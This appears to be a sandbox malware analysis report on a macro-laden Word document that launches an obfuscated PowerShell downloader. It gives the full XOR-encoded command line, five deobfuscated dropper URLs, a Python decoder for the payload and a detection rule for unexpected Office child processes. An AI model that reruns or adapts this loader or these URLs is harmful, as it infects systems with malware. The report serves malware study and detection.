Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    20-05-2024 13:59

General

  • Target

    5f73269a632986304114e57d3eb98b53_JaffaCakes118.doc

  • Size

    109KB

  • MD5

    5f73269a632986304114e57d3eb98b53

  • SHA1

    fb222d6c7b0f99612d5da76e0e0479b5d196590e

  • SHA256

    02c97c7cfa6fa18281256b83b09b0457d667c095c64bdcdab009cefaeed524a5

  • SHA512

    98158dbb354ecb5a3d17c298f1d5a1d62ac26d252090a78a17c2c95bb58e63e1cd2746a6a95e79b3b5522a6dde74018d04e58c13b86b94fc7cd2b85082527e6d

  • SSDEEP

    1536:3FFFF7dC7MQMXc0qg4F5MnrA+aJks0abqExYBvAy42+Ge:XQ5g4fYXZAyh

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated URLs (exe.dropper)
    http://www.copticpope.org/7nCPQr/
    http://wevik.hu/oadkCq/
    http://jakeingles.com/W3cw/
    http://www.kaukabphysiatry.com/hg9g/
    http://www.facebook.printuser.nl/dhxj/
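The five exe.dropper URLs above are what the sandbox recovered by decoding the PowersHell.exe command line listed in the Processes section. The Python below is an added worked example, not part of the sandbox report, that reproduces the decoding offline: the payload, the ten delimiter characters, the XOR key 0x3d and the `$VerbosePreference` trick are copied from that command line; the function names and the URL regex are this example's own.

```python
import re

# Payload string copied verbatim from the PowersHell.exe command line in the
# Processes section of this report. The decoding pipeline is also taken from
# that command line: .SplIT('<X!_q{jET}') | % {[ChAr]($_ -bxOR 0x3d)} -jOIN ''
OBFUSCATED = "25X71X91!126!0_83<88q74_16<82{95!87<88{94}73j29T115{88{73{19j106j88{95!126{81{84T88E83j73j6_25X77j77}100j0q26X85T73X73_77_7!18<18_74X74}74T19_94_82T77X73<84!94{77}82T77T88<19{82{79_90E18E10<83_126}109T108X79}18T125X85_73}73{77<7!18{18<74}88}75j84T86}19}85q72X18q82X92!89E86!126E76!18E125{85X73!73T77_7E18E18X87}92q86j88}84}83T90}81_88j78j19E94!82<80j18X106{14q94!74_18}125E85{73T73}77E7!18_18}74E74{74{19q86X92}72{86j92{95!77T85{68<78E84T92X73}79{68E19q94E82<80X18{85_90<4X90{18}125X85!73_73_77X7!18T18{74X74}74!19_91q92_94<88{95!82{82_86{19}77}79!84q83{73j72}78T88{79T19!83{81j18X89T85T69q87_18q26X19q110!77E81j84X73_21T26q125j26q20!6{25<105j114q106<29X0T29j26}4<14T26X6X25<73E85_116j0T25T88T83<75X7}73j88j80{77<22j26}97{26{22q25T105E114X106j22_26_19{88!69j88{26!6!91!82!79{88E92X94_85X21T25_107j79}105T29T84T83T29<25j77j77<100!20{70j73X79_68E70j25}71}91{126}19j121}82j74<83<81T82!92E89{123_84!81E88{21T25j107<79X105_17X29T25E73{85!116<20{6_110!73E92X79j73!16_109E79j82q94T88q78<78}29E25_73!85E116q6{95{79q88j92_86T6{64_94}92q73T94!85T70{64X64"
DELIMITERS = "<X!_q{jET}"  # the ten split characters used by this sample
XOR_KEY = 0x3D              # single-byte key applied to every decimal token


def deobfuscate(blob: str, delimiters: str = DELIMITERS, key: int = XOR_KEY) -> str:
    """Replay the PowerShell pipeline: any delimiter character separates one
    decimal token, and each token XORed with the key is one character of the
    real script."""
    to_space = {ord(c): " " for c in delimiters}
    tokens = blob.translate(to_space).split()
    return "".join(chr(int(tok) ^ key) for tok in tokens)


def resolve_sink() -> str:
    """The decoded text is piped to `. (([String]$VerbosePreference)[1,3]+'x'-join '')`.
    $VerbosePreference defaults to 'SilentlyContinue', so indexes 1 and 3 give
    'i' and 'e'; with 'x' appended the dot-sourced command is Invoke-Expression."""
    verbose_preference = "SilentlyContinue"  # PowerShell default value
    return verbose_preference[1] + verbose_preference[3] + "x"


# URL pattern is this example's own; the sample keeps its URLs in one
# '@'-separated string, so '@' terminates a URL here.
URL_RE = re.compile(r"https?://[^'\"@\s]+")


def extract_urls(script: str) -> list:
    return URL_RE.findall(script)


def analyse(blob: str = OBFUSCATED) -> dict:
    script = deobfuscate(blob)
    return {"script": script, "invoked_via": resolve_sink(), "urls": extract_urls(script)}


if __name__ == "__main__":
    result = analyse()
    print("sink:   ", result["invoked_via"])
    print("script: ", result["script"])
    for url in result["urls"]:
        print("url:    ", url)
```

The delimiter set and key are parameters rather than hard-coded inside the decoder because both change from sample to sample; read them off the `.Split(...)` and `-bxor` operands of the command line before running. Note also that the decoder never touches the network: the downloads and `Start-Process` in the recovered script are only printed, never executed.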

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro. In this run the parent is WINWORD.EXE (PID 1672) and the unexpected child is PowersHell.exe (PID 1212); together with the "Office loads VBA resources" signature below, the macro path is the likely one.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5f73269a632986304114e57d3eb98b53_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2500
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe
        PowersHell ('25X71X91!126!0_83<88q74_16<82{95!87<88{94}73j29T115{88{73{19j106j88{95!126{81{84T88E83j73j6_25X77j77}100j0q26X85T73X73_77_7!18<18_74X74}74T19_94_82T77X73<84!94{77}82T77T88<19{82{79_90E18E10<83_126}109T108X79}18T125X85_73}73{77<7!18{18<74}88}75j84T86}19}85q72X18q82X92!89E86!126E76!18E125{85X73!73T77_7E18E18X87}92q86j88}84}83T90}81_88j78j19E94!82<80j18X106{14q94!74_18}125E85{73T73}77E7!18_18}74E74{74{19q86X92}72{86j92{95!77T85{68<78E84T92X73}79{68E19q94E82<80X18{85_90<4X90{18}125X85!73_73_77X7!18T18{74X74}74!19_91q92_94<88{95!82{82_86{19}77}79!84q83{73j72}78T88{79T19!83{81j18X89T85T69q87_18q26X19q110!77E81j84X73_21T26q125j26q20!6{25<105j114q106<29X0T29j26}4<14T26X6X25<73E85_116j0T25T88T83<75X7}73j88j80{77<22j26}97{26{22q25T105E114X106j22_26_19{88!69j88{26!6!91!82!79{88E92X94_85X21T25_107j79}105T29T84T83T29<25j77j77<100!20{70j73X79_68E70j25}71}91{126}19j121}82j74<83<81T82!92E89{123_84!81E88!21T25j107<79X105_17X29T25E73{85!116<20{6_110!73E92X79j73!16_109E79j82q94T88q78<78}29E25_73!85E116q6{95{79q88j92_86T6{64_94}92q73T94!85T70{64X64'.SplIT('<X!_q{jET}' )| % {[ChAr] ( $_-bxOR 0x3d )}) -jOIN '' | . ( ([StrIng]$VErbosEPRefeReNCE)[1,3]+'x'-joIN'')
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1212
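The "Process spawned unexpected child process" signature and the tree above describe one detection: an Office parent launching a script host with an obfuscated command line, while a 32-bit Office build spawning splwow64.exe is normal. The Python below is an added example of that logic and is not the sandbox's own rule set. It runs over constructed process-creation events modelled on the tree above; the explorer.exe parent of WINWORD.EXE (PID 1000) and the abbreviated PowerShell payload string are assumptions for the sample, the rule names and thresholds are this example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"


@dataclass
class ProcessEvent:
    """Subset of a process-creation record (Sysmon Event ID 1 / EDR telemetry)."""
    pid: int
    image: str
    command_line: str
    parent_pid: int
    parent_image: str


# Constructed events modelled on the process tree in this report. The explorer.exe
# parent of WINWORD.EXE (PID 1000) is assumed, and the PowerShell payload string is
# abbreviated to its first tokens; images, PIDs and arguments are as listed above.
SAMPLE_EVENTS = [
    ProcessEvent(1672, WINWORD,
                 f'"{WINWORD}" /n "C:\\Users\\Admin\\AppData\\Local\\Temp\\'
                 '5f73269a632986304114e57d3eb98b53_JaffaCakes118.doc"',
                 1000, r"C:\Windows\explorer.exe"),
    ProcessEvent(2500, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288",
                 1672, WINWORD),
    ProcessEvent(1212, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe",
                 "PowersHell ('25X71X91!126!0_83<88q74_16<82{95!87<88{94}73j29T115'"
                 ".SplIT('<X!_q{jET}' )| % {[ChAr] ( $_-bxOR 0x3d )}) -jOIN '' "
                 "| . ( ([StrIng]$VErbosEPRefeReNCE)[1,3]+'x'-joIN'')",
                 1672, WINWORD),
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Children Office legitimately starts: splwow64.exe is the 32-bit-to-64-bit print
# spooler proxy that 32-bit Office launches on x64 Windows (PID 2500 above).
EXPECTED_OFFICE_CHILDREN = {"splwow64.exe"}

# Command-line markers of the split / XOR / join loader seen in this report.
OBFUSCATION_INDICATORS = {
    "xor-decode": re.compile(r"-bxor\b", re.I),
    "char-cast": re.compile(r"\[char\]", re.I),
    "split-then-join": re.compile(r"\.split\(.*-join", re.I | re.S),
    "iex-from-variable-index": re.compile(
        r"\$verbosepreference\)?\s*\[\s*\d+\s*,\s*\d+\s*\]", re.I),
}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: ProcessEvent) -> Optional[dict]:
    """Return an alert dict for an unexpected Office child, or None."""
    parent, child = basename(event.parent_image), basename(event.image)
    if parent not in OFFICE_PARENTS or child in EXPECTED_OFFICE_CHILDREN:
        return None
    indicators = [name for name, rx in OBFUSCATION_INDICATORS.items()
                  if rx.search(event.command_line)]
    severity = "low"                     # any other child of Office is worth a look
    if child in SCRIPT_HOSTS:
        severity = "medium"              # script host under Office: the page's signature
    if indicators:
        severity = "high"                # plus an obfuscated loader on the command line
    return {"pid": event.pid, "parent": parent, "child": child,
            "severity": severity, "indicators": indicators}


def detect(events: List[ProcessEvent]) -> List[dict]:
    return [alert for alert in map(evaluate, events) if alert]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The allowlist of expected Office children is deliberately short; widening it (for example to every signed Microsoft binary) is how this detection is usually weakened, since the malicious child here is the legitimately signed PowerShell binary started with a hostile command line.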

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      3a47f6bbe4f80c56031d75205788ed90

      SHA1

      af044cb4650d37623f16bfa3b64f1fac1539d31d

      SHA256

      4235919f6cdcccf8e2177ad994d78a9b5a65736434de15f02da63b177a5e8c9a

      SHA512

      a4f1d6f6e258613549ced3194d5e79cb30752b68f2147aee6233514a7b4879745173d51badc1a02ed35085923abd2914ac43d4cc4ed1c2da2eee548e376e41f2

    • memory/1672-19-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-57-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-81-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-18-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-75-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-74-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-64-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-17-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-50-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-43-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-36-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-29-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-22-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-16-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-20-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-0-0x000000002FA01000-0x000000002FA02000-memory.dmp

      Filesize

      4KB

    • memory/1672-24-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-2-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

    • memory/1672-21-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-15-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-6-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-80-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-78-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-77-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-76-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-12-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-9-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-8-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-7-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-89-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

    • memory/1672-90-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1672-106-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB